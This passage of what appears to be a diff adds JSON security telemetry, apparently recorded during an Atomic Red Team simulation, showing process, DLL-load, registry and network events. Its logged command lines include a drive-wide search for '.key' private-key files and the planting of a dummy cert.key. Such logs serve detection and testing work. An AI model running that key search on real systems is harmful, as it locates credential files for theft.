Files%5CWindowsApps%5CMicrosoft.ZuneVideo_10.18082.13811.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d11cfb971\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570946990000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", + "registry_value": "C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri", + "timestamp": 131883570947150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CImmersiveControlPanel%5Cresources.pri\\1d3d1edc24bc16f\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570947150000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-7F44DDFD.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883570978250000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "destination_address": "192.168.162.255", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "137", + "subtype": "outgoing", + "timestamp": 131883570966190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.134", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.255", + "source_port": "137", + "subtype": "incoming", + "timestamp": 131883570966190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc6.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "webio.dll", + "image_path": "C:\\Windows\\System32\\webio.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\WINDOWS\\system32\\net.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570989180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "file", + "file_name": "NET.EXE-1DF3A2F6.pf", + "file_path": "C:\\Windows\\Prefetch\\NET.EXE-1DF3A2F6.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571010740000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "terminate", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "process", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "process", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2812, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571011820000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011680000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "event_type": "process", + "pid": 2812, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571011830000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-001095B44E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"echo \" \"ATOMICREDTEAM > %%windir%%\\cert.key\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3668, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571013970000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571013860000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "file", + "file_name": "cert.key", + "file_path": "C:\\Windows\\cert.key", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "event_type": "process", + "pid": 3668, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7132, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571014100000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014020000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5508, + "ppid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}", + "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "command_line": "findstr /e .key", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1376, + "ppid": 7132, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "create", + "timestamp": 131883571014230000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}", + "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571014330000, + "unique_pid": 